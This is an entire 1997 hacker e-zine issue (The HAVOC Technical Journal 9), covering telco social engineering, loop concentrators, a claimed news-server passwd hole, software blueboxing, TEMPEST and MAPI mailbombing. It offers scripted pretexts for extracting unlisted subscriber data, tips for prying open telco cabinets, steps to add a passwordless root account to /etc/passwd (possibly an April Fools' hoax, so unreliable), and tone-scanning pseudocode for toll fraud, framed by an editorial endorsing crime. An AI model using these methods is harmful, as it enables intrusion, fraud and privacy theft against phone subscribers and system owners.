Copy Link
Add to Bookmark
Report
The Havoc Technical Journal 09
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The HAVOC Technical Journal ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
Vol. 1 | No.9 | April 1st, 1997 | A HAVOC Bell Systems Publication
"In /dev/null no one can hear you scream." - Redtyde
_____________________________________________________________________________
--=[The HAVOC Technical Journal Issue 9]=--
Editorial..............................KungFuFox
Social Engineering Your RBOC...........KaiserS
Subscriber Loop Concentrators..........Optimus
News passwd hole.......................Scud-O
International Software Blueboxing......memor
TEMPEST................................Optimus
MAPI Mailbombing Part I................Scud-O
FCC Frequency Allocations..............Keystroke
1aESS..................................Optimus
X-Toolz................................lurk3r
TFTP...................................Scud-O
The News...............................KungFuFox
Reader Survey..........................THTJ
IRC Logs...............................Undernet
Phonecalls.............................THTJ
"The internet is the antithesis of control. It redistributes
power and undermines control." -Jon Katz, The Netizen
_____________________________________________________________
The HAVOC Technical Journal - Information
- Editor in Chief : Scud-O, foxmulder@worldnet.att.net
- Acting Editor: KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@juno.com
- THTJ website: www.geocities.com/siliconvalley/8805
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784
The HAVOC Technical Journal Vol. 1, No.9, April 1st, 1997.
A HAVOC Bell Systems Publication. Contents Copyright (©)
1997 HAVOC Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of HAVOC
Bell Systems Publishing. [No copying THTJ, damnit.]
The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]
"We're building a wired world, but all those wires are
crossed. We've had a lot of warnings. Pretty soon, we're
going to start having disasters. It's time we started looking
harder at the threats." -Simson Garfinkel, Wired Magazine
_____________________________________________________________
---------------
--=[Editorial]=--
Written by KungFuFox
---------------
When I think about the electronic underground out there, about the warez
traders, the phreaks, hackers, crackers, anarchists, and all the others, I
see a buncha people who enjoy what they're doing, with good reason. You all
have your reasons for residing in the underground community, even if they're
really naughty reasons. One thing that all of you share [besides 0-day
warez, k0dez, toenz, phone numbers, card numbers, payphones, toilets, hotel
rooms,... er, I'm getting off track here] is what I'll call the big picture;
it's us against them.
Right about now, you're probably thinking that I'm nuttier than a payday
candybar, or you may be wanting to know who 'they' are. Yes, I am nuttier,
but anyways, that 'us against them' thing is an old cliche, but I'm not a
genius so I used it. This simple equation should adequately illustrate who
'they' are: they = evil corporations in the sky.
For me, the word corporation conjures up images of an old man sitting at a
big desk on the top floor of a skyscraper. He's probably staring at some
newspaper's stocks & bonds page, and laughing at all the profits that his big
evil corporation is raking in, but my imagination isn't that vivid, so I
can't be sure what he's doing, maybe he's molesting a napkin, I don't know.
Back to my story...
That old man isn't interested in how good the customers feel about his
corporation's products, and that's not just because he's old, lots of middle
aged people have the same problem he's got, and it can't be cured by a 12
step program, like alzhiemers or redbox addiction. His problem is greed, and
it's cost him his status as a philanthropist, but who really cares?
*WARNING*
[If you are a faint hearted retard, the below statement may be lethal. All
personal injury claims may be sent to Bell Communications Research Inc.,
Courtesy of HAVOC Bell Systems, 445 South Street, Morristown, NJ, 07960.]
The corporate world of the 20th century isn't about ethics, not good
business, it's all about money. [shocking!] There aren't any real political
empires out there anymore, because imperialism was deemed unethical by the
United States, and we're all well aware that the United States is the most
ethical place in the world, right? So naturally something has got to replace
the power that political empires used to have, and voila; we get corporate
imperialism.
If you can't control things with an army, why not just take over wide
areas of the economy by owning and producing everything that people buy? Is
that what YOU were thinking? Right! So the old man's army of accountants,
and marketers, and productions staff, and jackoffs, and asshole managers, and
expert lawyers, and enslaved mexican laborers are all set to work building
this empire that that old man wants so bad. It's not as simple as that, but
I just recently found out that not all of our readers are economists, which
really bummed me out.
What has replaced political imperialism is corporate imperialism, and
instead of soldiers being sacrificed in the name of territorial expansion,
it's consumers being sacrificed in the name of higher profits. Now being the
noble protectors of consumer freedom that we members of the electronic
underground are, we've got to do something, right? Well little do you know,
you've probably already helped the cause.
All attempts at conquering a group of people, may they be military or
economic, are met with resistance, and we are that resistance.
We each play an important role in this war against corporate imperialism, and
we all contribute to the well being of our fellow electronic citizen, whether
we realise it, or not.
The warez traders slow unfair software company profiteering. Phreaks
bypass the ridiculous pricing system of the phone company. Hackers free
information for the electronic community. Crackers break down the walls that
have been erected for the purpose of profit. And anarchists keep
corporations from going about their business as usual.
It isn't about who wins or loses, it's how you play the game, right?
Well upsetting as it may be, the corporations are cheating, and winning. We
are the liberators, the equalizers in a society polarized by gluttonous
profiteering. Without us, the world would not be a better place, it could
only be worse, and things would basically suck.
If you phear the media, because they said we're bad guys, pay close
attention: the media is owned by corporations, so they say what that old man
at the top of the skyscraper wants them to say. Nothing you see on the news
is pure unadulterated goods, because that wouldn't be prudent. Well, the
real reason isn't about prudence, I made that up. It IS about making certain
aspects of life look good, and others look bad. That's why that old man
always makes himself look swell, and blames us evil hacker types for ruining
his honest business practices.
Unbelievable as it may be, they phear us. We're what stands in the way
of infinite profits, and wouldn't you know it, that pisses them off. They
phear because they don't know who we are, unless they're luck enough to catch
us, which isn't as often as it may seem. None of those old men, or anyone
that works for them, will ever meet you, or know your real names, and yet you
are pheared. The next time you're hacking a shell, or phreaking your
grandma, or insulting an OCI operator, or just tradin' some warez, think
about who you're hurting, it's not the little guys, they don't have to pay
the bills if they don't want to; it's that evil old man. If you have a moral
problem hurting old men, just replace the words 'old man' with your favorite
corporate executive. I've provided a few examples: Steve Case, Bill Gates,
Michael Eisner, or even Bill Clinton, since he rips us off anyway.
This editorial is a reminder for those of you who may feel wary of
breaking the law, or doing something 'wrong'. Nothing you do is wrong, so
long as it's not against a moral opponent, or some innocent bystander who
didn't piss you off or give you a good reason like 'he looked stupid'. At
least justify it, so when the judge asks you what the hell you were thinking
when you pranked the mayor at 3am and insulted his wife's obesity, you can
tell him that you were just trying to offer some constructive criticism.
At the same time, you shouldn't feel as though the hacker devil will
strike you down if you don't help out the cause and fight corporations or
something, because that's not why you got into H/P/C/V/A in the first place.
You got into it because it was fun, or a challenge, or some other real
creative reason. Maybe you wanted to go somewhere that you weren't supposed
to go, or maybe it was just about taking risks (and not getting caught).
Don't hesitate to admit you don't give a shit about the big picture,
because the big picture is boring and stupid, and you just want k0dez, right?
I'll end this by thanking Scud-O for giving me the opportunity to edit this
magazine, and may it live long and prosper. To all of you readers, hopefully
you'll come out of this experience with some info that you can use in all of
your underground adventures, and maybe you'll enjoy reading it at the same
time. [If you haven't noticed already, I made a few format changes, so don't
panic... this is the same magazine.]
All questions, comments, and good stories may be emailed to me at:
mazer@cycat.com
"...there is no scenario that I can see where a system-wide
failure of networks would occur due to the internet."
-Tim Harmsen, CEO of Digital Vision Communications
_____________________________________________________________
----------------------------------
--=[Social Engineering Your RBOC]=--
Written by KaiserS
----------------------------------
There are several areas that can be included, or described as "phreaking", in
this article, I will discuss some basics of social engineering, perhaps one
of the best ways to accomplish large tasks in a small amount of time (without
hacking, and jailtime). For those of you who do not know what social
engineering is, let me give you a brief rundown...
Social engineering involves taking on the identity of, in this case a bell
employee, in order to make yourself appear to be an inside bell employee, and
get information that is not publicly available, or, in extreme cases,
add/move/change service, or disconnect service altogether.
One of the best things to have when you begin is not knowledge, but rather, a
deep radio voice...you need to sound like you are "ON AIR" (it makes the bell
ladies that work the desk jobs swoon)....
Well...enough with the intro...
Social engineering unlisted name/address info from a telephone number only,
or, the unlisted telephone number from name and address.
FIRST!
You need to have a technical number like the ICSC/ICMC, call information, and
ask for REPAIR...then call repair, and say that you have a private line
circuit that is down, and you need the IC repair number...
Once you have that number, you are homefree!
Call the IC Repair number, and act like you have reached the wrong number:
<YOU> Hello? what center have I reached??
<BELL> The interexchange carrier maintenance center (ICMC)
<YOU> OH! I am sorry, would you please transfer me to MLAC, or the LDMC, and
give me the number before you do in case I drop off.
<BELL> Sure, (searching through a phonelist) (they may have it
listed under FACS) I cant find it...
<YOU> Well, I need to speak to someone who works FACS, or PREMIS
<BELL> Ah, here it is...
I will not be giving out those numbers in this article...if you
cannot get this far...well:)
Once you have MLAC, or the LDMC...
Call them!
Getting unlisted address/name info from a telephone number...
<YOU> Hi, this is Dan (any name) at the frame of the ANYTOWN01 (usually it
will be "the town the # is in", and "01, 02, 03, 11, or, 12, i.e.,
Garrison11)
<YOU> I need you to go into FACS, and pull 200 555-1234
<BELL> OK, what do you need?
<YOU> can you pull the address, and binding post information??
<BELL> Sure...
she will give you the address, and several long, hyphenated numbers...these
designate where the pair s located in the terminal (b-box)
<YOU> Great, do you have SORD??
<BELL> Yes.
<YOU> Can you pull the subscriber name?
<BELL> Yes, I see it listed as : Joe Blow...or whatever:)
<YOU> thank you, have a good day.
Getting unlisted number/numbers from an address...
Call MLAC again...
<YOU> Hi, this is Dan (any name) at the frame of the ANYTOWN01
<YOU> I need you to go into PREMIS, and pull 123 Main Street, Anytown USA.
<BELL> OK, what information do you need?
<YOU> I need all lines terminated at that PREM LOC.
<BELL> OK, I see two lines terminated there, they are...(she will give you
the telephone numbers)
<YOU> Thank you, and have a good day...
Now, I will explain some of the terminology I used:
MLAC = Mechanized Loop Assignment Center
LDMC = Loop Distribution and Maintenance Center (same as MLAC)
FACS = Facilities Administration Computer System
PREMIS = Doesn't have a neat acro (that I know of) Maintains records by
premises info
SORD = Service ORDer system
Well, that's it for this writing...hope this can be put to good use, as this
is one of the best ways to start out, there are many other thing (neat
tricks) that can be accomplished through these same centers, but this is a
start, and will be quite an asset.
_____________________________________________________________
-----------------------------------
--=[Subscriber Loop Concentrators]=--
Written by Optimus
-----------------------------------
The Universal SLC (Subscriber loop concentrator) has two main parts, the
Central Office Terminal (COT) and the Remote Terminal (RT) commonly connected
by a t1 digital line or optical fiber connection. The COT and RT are composed
of four shelves labeled alphabetically. Each shelf has twenty-four channels.
In an intergrated SLC system, the COT is replaced by the Digital Carrier Line
Unit (DCLU) in a 5ess or similar switch. A SLC with a Feature Package B (FPB)
can interface to a SLC COT, DCLU, Subscriber Loop Interface Module (SLIM) and
a LM12 Multiplex.
The most comman SLC system is there Series 5. The series 5 is
based on two independant 96-line systems that are packaged into one 5
shelf, dual bank assembely.
The Bank Control Unit (BCU) and Alarm Display Unit (ADU) monitor
for system failures within the SLC system, and its interface. If someone
goes wrong on either end, the other end is notified via the Alarm Interface
Unit (AIU). An important thing to mention is that many SLC systems have an
alarm function called DLR ALM, which was conveinently spelled out on a 51a
SLC for me as a Door Alarm. The particular 51a had a small round piece of
metal protruding from the upper right hand corner, which would be held in
when the door was closed and consequently pop out when the door opened. After
30 seconds of this metal being out, the DLR ALM light would light. This is
undocumented in all of the many SLC related manuals I have in my possesion,
but from logic, when tripped, the ADU on the COT or related interface at the
CO is probably notified. SLC's are fairly easy to spot, usually stored in a
51a, 80d or 80e cabinets, or frame mounted within a 16 or 24 foot CEV
(Controlled Environment Vault), PCH (Pre-cast Concrete Hut) or inside a
customer's location.
The 51a is usually a slate or gray colored cabinet mounted off the
ground on either a pole or a pedestal. The 51a has two sections that open.
The front section, the Electronics Section, contains the power shelf, fan
unit, one dual channel bank which I mentioned earlier (allowing up to 192
subscriber loops (pots)) and the protection panel (following the phone
companys usually standard of high power protection). The ADU device is
usually either a card mounted in the Channel Bank or a seperate unit place on
top of the fan or power shelfs. The back section, the Battery Section,
contains power backup equipment and battery's to keep the SLC running in case
its direct power connection fails or the area has a blackout. These sections
are designed to only be opened with a common allen wrench with a hole drilled
down the middle of it, but can commonly be opened with a good pair of
needle-nose pliers.
The 80D RT housing is more slender but wider then the 51a usually a dark
brown color with a white frame. The size of the 80D allows most areas to be
reacher from either the front or the back. The exception to this is on the
front you have access to the AC power panel and outlets. Oppisite these on
the back is the main splice for your cabling, a sort of miniature cable
vault. It is common to find these equipped with a fiber feed, which replaces
a channel bank on the back with a fiber mulitplexer allowing only three dual
channel banks supporting 576 subscriber loops (pots). When not equipped with
a multiplexer, the 80D contains 4 dual channel banks (768 subscriber loops
(pots)). I have never opened a 80D, but have been told it takes one of the
two basic telco keys, a 3/8ths or a 5/16ths hex driver (found on a Can/Cam
wrench). 80D's are always PAD mounted.
The 80E is basically an extra large 80D, allowing 8 dual channel banks,
supporting 1536 subscriber loops (pots) unless fed by a fiber link which, as
in the 80D, replaces a dual channel bank with a multiplexer which I would
believe should be the feed of choice for every installation of this system.
I've never seen one of these, but they must be pretty badass from what I've
read about them. These are also capable of containing t1 repeater shelves for
t1 extensions. The 80E is also pad mounted. The battery compartment on the
80E is kept on the very bottom of the unit. The front and back of the 80E are
divided into four columns. The front left side contains the AC interface, as
the back left side is as general in 80 SLC's the splicing area. The rest of
the back of the 80E is dual channel banks with the exception of an unknown
device in the upper right hand corner. Probably relating to the lightguide
equipment opposite it. The two middle columns on the front of the 80E contain
two dual channel units and the ringing, rectifier and other misc shelfs. The
right column on the front is where the lightguide (fiber optic feed)
equipment is kept when using a fiber feed, or another dual channel bank if
not.
If you ever get into a CEV or a PCH, the SLC system is arranged much the
same, just to a larger extent. The PCH's will usually contain 30, 36 or 40
dual channel banks, depending on the PCH size and the type of feed. The CEV's
will usually contain 20, 24, 30 or 36 dual channel units depending on the
same specifications.
I have more information on other SLC cards and systems if you need
something specific. This information will hopefully give you a general idea
of what these boxes you see on the sides of the road are and what they do.
Basic Data Encoding
The simplest form of the data transfer method on a digital line is a
bit. A bit is either a zero or a one, zero being off and one being on. Eight
bits are comprised into a byte. One byte represents a single digital
character. An example is the letter "A", which in binary would be "01000001".
A T1 digital line (also knows as a 1.5, T-1, T-Span, T-Line, DS-1) is a
digital line capable of transmitting voice, data, video and computer
information at a rate of 1,544,000 Bits Per Second (BPS) (1.544 Mbps). A
pulse (also known as a one or a mark) is the electrical postive or negative
signal sent across a digital line. A No Pulse (also known as a zero or a
space) is there is no electrical signal present on the digital line.
A Bi-Polar Return To Zero (RZ) also called an AMI, is one of the simplest
protocols for a T1 line. The electronic signal blips into a postive or
negative charge, both representing a transmission pulse. Between each 'blip'
the signal returns to zero voltage for a short period of time, not being long
enough to be recongized as a Non Pulse Bit (NPB). If the signal stays at zero
through the allotted time slot, it is then recognized as a NPB transmission.
A logic error or a bit error is when a bit is transmitted in one position and
recieved in another. For example a one is received where are zero was sent.
This is common, and brought one the creation of crc checking for the digital
line. A Bi-Polar Violation (BPV) is when two ones are transmitted
consecutively on the same side of a zero. Simply put, it is when two positive
or negative ones are received one after the other, when under normal
circumstances, the bits would alternate polarity.
After one-hundered and ninety-two prior bits are sent across the twenty-four
channels of a T1, a framing bit is sent, making it the one-hundred and
ninety-third bit. This is used to identify the end of a bit segment. So if
each of the twenty-four channels send eight bits, making a one-hundred
multiplied by 8000 (the approximate number segments sent per second) gives us
1,544,000 bps, our T1 line.
B8ZS - Binary Eight Digit Zeroes Substitution. B8ZS allows a T1 subscriber to
follow T1 Tariff requirements which do not allow fifteen consecetive zero
bits. B8ZS takes a full 0 byte and changes it to look like "000+-0-+" which
would be "0011011" without polarity.
Customer Service Unit (CSU) - Equipemnt connected at the customer end of a
1.5 circuit
Channel Service Unit (CSU) - Save as above
Network Interface Unit (NIU) - Placed on the customer end of a 1.5 circut to
facilitate testing of the circut.
D-4 Bank - A Multiplexer that combines 24 voice channels into a single
digital output signal, 1.5mbps
Extended Super Frame (ESF) - One quarter of the bits are used to frame a
digital transmission.
Digital Service Classifycations:
DS0 - 64 kbps - 1 Voice Circut
DS1/T1 - 1.544 mbps - 24 Voice Circuts
DS1C/T1C - 3.152 mbps - 48 Voice Circuts
DS2/T2 - 6.312 - 96 Voice Circuts
DS3/T3/LT - 44.736 mbps - 4672 Voice Circuts
DS3C/LW - 89.472 mbps - 1344 Voice Circuts
DS4/LW - 274.176 mbps - 4032 Voice Circuts
DS5/FT"G" - 1667 mbps - 24192 Voice Circuts
Optimus <rewt@null.net>
_____________________________________________________________
----------------------
--=[News passwd hole]=--
Written by Scud-O
----------------------
While setting up my news server, i was experimenting, and i have
discovered a very huge hole that will be causing some sysadmins some
sleepless nights.
What follows below are the steps to not only read, but access and
append any number of accounts to the /etc/passwd .
1. Set your NNTPSERVER environment variable
usually, this is set to what ever you or your isp use as the news
server, anyhow, change it to the localhost name so you are using the
local server as news host.
Ex: NNTPSERVER=news.digex.net ; export NNTPSERVER
would go to
NNTPSERVER=limbo ; export NNTPSERVER
since limbo is my local host.
or you can just modify the /etc/nntpserver if you want to be different
2. Create/ Modify your .newsrc file
add the follwing 'newsgroup' to the file and keep it as the only one:
/.etc.passwd
3. Either run trn -r of tin to read the 'news'
Ex:
tin -r
tin 1.2 PL2 [UNIX] (c) Copyright 1991-93 Iain Lea.
Connecting to limbo...
Reading news active file...
Reading attributes file...
Reading newsgroups file ...
--- etc ----
And you should see your password file, which each line being
a different article.
4. Or, better yet, use trn and post an 'article'
While you are running trn and reading a 'news' article, press f . it
will then prompt you with:
Are you starting an unrelated topic? [ynq]
Well, type y , since otherwise you can REALLY mess up the passwd file!
Next the news reader will prompt you for the subject and distribution
Enter to following:
Subject: ignore no reply
Distrubution: na
If you are wondering what the 'ignore no reply' is for, it is so that
the server will not mail you back saying the message has been posted,
which otherwise could point you out to the sysadmin if he views any
logs!
The distribution basically tells the servers that this is only
to be sent to 'na' or North America, this line really doesnt matter,
but nntp can and will be picky about this.
Now trn will spit some stuff out at you and you should finnaly get to
where it asks you which editor to use to edit the message, the default
should be vi, and if it is not i would change it to vi, unless you wish
to use another editor.
Ex:
Newsgroups: /.etc.passwd
Subject:
Summary:
Expires:
Sender:
Followup-to:
Distributuion: na
Organization:
Keywords:
Cc:
rewtbeer::0:1:i like rewt beer:/home/rewt:/bin/sh
When you are finished typing this all in, save it with :wq .
trn will then show you the name and and info about the 'newsgroup' you
are sneding to:
Your article's newsgroup:
/etc.passwd <nothing should be displayed here>
Check spelling, Send, Abort, Edit, of List? s
Type s to send out your article.
trn will then return to the article you were reading. press q to
exit and go login to your new shell!
How it works:
^^^^^^^^^^^^^
Ok, not this may sound kind of crazy, but the nntp stores news
in a standard directory pattern. This only makes sense, since this is
the easiest way to do things. now, since you throw in the / in the
newgroup, nntp moves from its regular directory to the root directory.
Then with the 'etc' it moves to /etc and with the final 'passwd' nntp
realizes that this is a file not a directory, and it opens it up for
writing/reading/appending.
So anyway, have fun, and next April 1st i hope you will look
for my article on how the impending sale of Netscape to HAVOC Bell
Systems may spell certain doom for Microslut.
_____________________________________________________________
---------------------------------------
--=[International Software Blueboxing]=--
Written by memor
---------------------------------------
When you don't have any technical skills in electronics, like you don't know
how to calculate U=RI or when you think AC is Asynchronous Christians, you
have to use a Software Bluebox...
That program generates the well known 2600 Hz Tone, KP Tone (Key Pulse), ST
Tone (Start) and the MF (Multi-Frequencies 700Hz-1100Hz) tones.
2600 Hz is normally the tone which makes the free call possible. It's a MF,
composed of two frequencies during a lapse of time. The old and typical
tone is..
Tone1 Frequency 1 = 2600Hz
Frequency 2 = 2400Hz
Length = 150ms
Delay = 10ms
Tone2 Frequency 1 = 2400Hz
Frequency 2 = 2400Hz
Length = 300ms
Delay = 10ms
After, you'll have to dial the KP-#Number-ST .. KP enables the
MultiFrequency Receiver, ST is the tone that means the call is completed.
Well, we never used to seize a french local phone number.. too dangerous,
or when calling a french local phone number, we have to pay something.
Like I can try to bluebox on (33) 0380293031 , trying to seize the phone
line, with an old 2600Hz.. But when I dial and complete the call for some
foreign country (B01xxxxxxxxxC) I will still pay the call...
Me -> (33)0380293031 (an Average of 0.26FF/Min .. US$1==5FF)
but well the (33)0380293031 will pay
(33)0380293031 -> B01xxxxxxxxxC (a lot of $$)
And the other problem is that (33)0380293031 is a Hospital, and the callers
are logged.. France Telcom has enough equipment for using a Bluebox Fraud
detection, and they use it for protecting French numbers against Fraud
Attempts and for busting kiddie phreakers.
So I personally use operators numbers, which are free for calling some CCS
(calling card services) in USA, Japan, UK, Austria, Sweden, Finland,...
(like the phone numbers I gave in bif2.txt)
Well I have to scan for finding the 2600Hz tones.. It can be for example:
Coloumbia CCS
Tone1 Frequency 1 = 2650Hz
Frequency 2 = 2450Hz
Length = 170ms
A delay between those 2 tones..
Delay = 10ms
Tone2 Frequency 1 = 2450Hz
Frequency 2 = 2350Hz
Length = 330ms
Delay = 10ms
and after I dial the Kp-#Number-St
dialing : B01219555555C
and well i'll pay
Me->Coloumbia CCS ... US$0
and Coloumbia CCS will pay
Coloumbia CCS->B01219555555C ... a lot of $$
There is a little algorythm for scanning the 2600Hz
*****************************************************************************
F1Interval1 is the Begin Frequencie1 \ Tone1
F2Interval1 is the Begin Frequencie2 / with Lenght1
F1AInterval1 is the Begin Frequencie1\ Tone2
F2AInterval1 is the Begin Frequencie2/ with Lenght3
F1Interval2 is the End Frequencie1 \ Tone1
F2Interval2 is the End Frequencie2 / with Lenght2
F1AInterval2 is the End Frequencie1\ Tone2
F2AInterval2 is the End Frequencie2/ with Lenght4
Delay is the delay between the 2 tones.. Default Value is 10ms, but u can
still change it.
*****************************************************************************
Procedure Scanning(F1interval1,F2interval1,F1interval2,F2interval2,
Delay,F1AInterval1,F2AInterval1,F1AInterval2,F2AInterval2,Lenght1,Lenght2,Lenght3,Lenght4)
Define F1interval1,F2interval2,F1AInterval1,F2AInterval1,Lenght1,Lenght2 Integer
Define F1Ainterval2,F2AInterval2,Lenght3,Lenght4 Integer
Define Delay Integer = 10
Define a,b,c,Testin,FirstCoolTone,SecondCoolTone,FirstCoolLenght,SecondCoolLenght Integer
Define FirstCoolTone1,SecondCoolTone1 Integer
/* It is the scan of the 1st Tone */
ask for &F1interval1,&F1interval2,&F2interval1,&F2interval2,&Lenght1,&Lenght2,&Delay
a=F1interval1
c=F2interval1
a=a-1
c=c-1
while(c!=F2interval2 and Testin!=1)
c=c+1
while(a!=F1interval2 and Testin!=1)
a=a+1
b=Lenght1
while(b!=Lenght2 and Testin!=1)
Sound(Voice1,b,a)
Sound(Voice2,b,c)
ask for a 1/0 in Testin /*is the Tone seems well.*/
b=b+1
EndWhile
wait(Delay)
EndWhile
EndWhile
FirstCoolTone=a
FirstCoolTone1=c
FirstCoolLenght=b
Wait(Delay)
Testin=0
/* It is the scan of the 2nd Tone */
ask for &F1Ainterval1,&F1Ainterval2,&F2Ainterval1,&F2Ainterval2,&Lenght3,&Lenght4,&Delay
a=F1Ainterval1
c=F2Ainterval1
a=a-1
c=c-1
while(c!=F2Ainterval2 and Testin!=1)
c=c+1
while(a!=F1Ainterval2 and Testin!=1)
a=a+1
b=Lenght3
while(b!=Lenght4 and Testin!=1)
Sound(Voice1,b,a)
Sound(Voice2,b,c)
ask for a 1/0 in Testin /*is the Tone seems well.*/
b=b+1
EndWhile
wait(Delay)
EndWhile
EndWhile
SecondCoolTone=a
SecondCoolTone1=c
SecondCoolLenght=b
Wait(Delay)
/*Display The Cools Tones And Time*/
Write(1st cool Tone.. F1: %FirstCoolTone f2: %FirstCoolTone1 lenght: %FirstCoolLenght)
Write(2st cool Tone.. F1: %SecondCoolTone f2: %SecondCoolTone1 lenght: %SecondCoolLenght)
End.
*****************************************************************************
There is a little algorythm for seizing with 2600Hz
*****************************************************************************
F11 is the Begin Frequencie1 \ Tone1
F21 is the Begin Frequencie2 / with Lenght1
F12 is the End Frequencie1 \ Tone1
F22 is the End Frequencie2 / with Lenght2
*****************************************************************************
Procedure Dialing(F11,F21,Lenght1,F12,F22,Lenght2,Delay)
/* Dialing Procedure */
ClearScreen
Write(Dialin')
ask &F11,&F21,&Lenght1,&Delay,&F12,&F22,&Lenght2,&Delay
/*1st Tone*/
Sound(Voice1,Lenght1,F11)
Sound(Voice2,Lenght1,F21)
/*Waitin Delay*/
Wait(Delay)
/*2nd Tone*/
Sound(Voice1,Lenght2,F12)
Sound(Voice2,Lenght2,F22)
/*Waitin Delay*/
Wait(Delay)
*****************************************************************************
How To Bluebox for connecting a network, using a modem.
-------------------------------------------------------
In the first place, you must plug the PhonePlug and the ModemPlug like so..
______ _____ _____
Wall | | | | |
In/Out| /___|Modem| /____ |Phone|
Phone | \¯¯¯|Plug | \¯¯¯¯ |Plug |
Line | |_____| |_____|
¯¯¯¯¯¯ | |
To The Computer.:' ':.To The Computer Speakers
You must prepare your Software Bluebox and your fav Terminal in 2 tasks
(Win3.1x,95,nt + DOS)
Task1:Bluebeep.exe (Msdos (Alt+Tab) )
Task2:Term.exe (Win3.11)
now.. prepare your modem:
ATZ
OK
To catch the carrier when you'll have it, the command ATD will be cool, ATD
is for dialing (D=Dialing) , but ATD alone catch the Modem Carrier.
ATDT3336431515 <- Don't prepare that.. Wrong
ATD <- Right String
Switch the Task on the BlueBox system, Phone your operator number, seize,
activate the multi-frequencies receiver with KP , Dial # number in MF , Call
is completed with ST.
When you heard the beep and the carrier Autoanswer of the targeted modem..
for example, call the 3615 Teletel French Network >> Dial : B03336431515C,
switch the task on your fav terminal and press the Return..
ATZ
OK
ATD
Connect 1200
^A
Teletel Network 3615
3614
3613
^C Nom du service:....................................
_____________________________________________________________
-------------
--=[TEMPEST]=--
Written by Optimus
-------------
For those of you who already know alot about tempest, skip this and
email me all you know, otherwise, read on... TEMPEST stands for Transient
Electromagnetic Pulse Standard. Tempest is a code name the government
created to define their electromagnetic radiation protection program. The
government still stands on the fact that Tempest monitoring does not exist
although millions of dollars go towards this program and many people have
proven it to be an actual threat.
In 1985, Wim van Eck, a dutch scientist, published a paper concerning
the threats of tempest eavesdropping. This paper caused stirring in many
government agencies, and it was immediatly classified. Most tempest
information remains classified to this day, not being allowed to anyone who
is not a certified tempest security consultant. This is the cause for the
scarce amount of information out there on tempest (sometimes known as van
eck) monitoring.
For a device to be TEMPEST certified, that is, approved that it does not
let out any or a largely unsubstantial amount of Electromagnetic radiation,
it must comply to NACSIM 5100A. This document happens to be classified by
the NSA though so alot of good it does to the normal citizen.
The basis behind TEMPEST is that everything emits electromagnetic
charges. When the power level behind these charges changes, they emit
electromagnetic pulses that transmit low level radio waves. The challenge
is to pick up these radio waves and reconstruct them into a form readable
and usable by the reciever.
This is just a small tidbit of information on TEMPEST. Most of
this information I've learned from TheCodex, a company providing
information on surveilance and couter-survailence. You can find them on
the web at http://www.thecodex.com. Optimus <rewt@null.net>
_____________________________________________________________
-----------------------------
--=[MAPI Mailbombing Part I]=--
Written by Scud-O
-----------------------------
I. Introduction of MAPI
^^^^^^^^^^^^^^^^^^^^^^^^
Ever since Microslut released the MAPI for Win 3.1, Adding and sending
mail to and from applications has been a breeze. And with Win95's integration
of MAPI has only helped it. Just look at your windows 95 desktop, and you
will see MicroSoft Exchange, probably the most popular mail program for w95.
Microsoft has also made it a requirement for a program to have some form of
MAPI to recieve a Windows 95 Logo.
Anyway, MAPI stands for Messaging Applications Programming Interface.
It is used by programmers to add basic, and advanced mail capabilities to a
program, and MAPI is part of Microslut's Windows Open Services Architecture
(WOSA), which is basically a set of common APIs for distributed computing.
II. The MAPI APIs & Architecture
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
There are 3 main MAPI APIs. The first one, Simple MAPI, is the most
commonly used api, and is the API we will mostly be using. The Common
Messaging Calls API, (CMC) has also been developed as a platform independant
replacement for MAPI (but so far i dont see the internet moving in hordes to
apody it.) It contains about 10 basic calls for basic messaging. And
finally, there is the big daddy of them all, The Extended MAPI. It is a large
API with many calls that are still being developed, and are mainly for
messaging only apps, like Exchange or a Mail Server.
Figure I
^^^^^^^^
Basic MAPI Architechure
Messaging Aware Apps Messaging Enabled Apps Messaging Based Apps
^ ^ ^
| | |
+-------------------------------------------------------------------------+
| |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
| | Simple MAPI CMC Extended MAPI OLE Messaging | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
| Messaging Subsystems |
| +------------------------------------------------------------+ |
| | Extended MAPI | |
| +------------------------------------------------------------+ |
+-------------------------------------------------------------------------+
| | |
^ ^ ^
Message Store Provider Address Book Transport
Provider Provider
Service Providers
^^^^^^^^^^^^^^^^^
The service providers are the components of MAPI that collectively
implement MAPI service on a system. The three type are Message Stores,
Address Book, and Transports.
The Message Stores are the messages you have under an inbox for example.
Just look at Exchange's or Netscape's inbox, and you are looking at a MAPI
Message Store. ( Well the Exchange is probably a better example, since
Netscape uses the Internet standards, while Exchange does MAPI, and
internet.)
The Address Book, is a gay little Microslut invention, that contains a
list of recipents for messages. ( i say gay, because it is a retarded name.)
And finally, the Transport providers are the link between a local system
to the remote systems ( i.e. Internet)
Simple MAPI
^^^^^^^^^^^
Ok, Simple MAPI is here to provide us with the functions to establish a
MAPI session, perform messaging functions, and close down the connection.
A list of MAPI Calls
[================================================================]
| Simple MAPI Call Description |
|================================================================|
| MAPILogon Log on to service |
| MAPILogoff Log off from service |
| MAPIFreeBuffer Free all allocated memory |
| MAPISendMail Send a piece of mail |
| MAPISendDocuments Send file(s) in a message |
| MAPIFindNext Find Messages |
| MAPIReadMail Get Messages |
| MAPISaveMail Save Messages |
| MAPIDeleteMail Delete Messages |
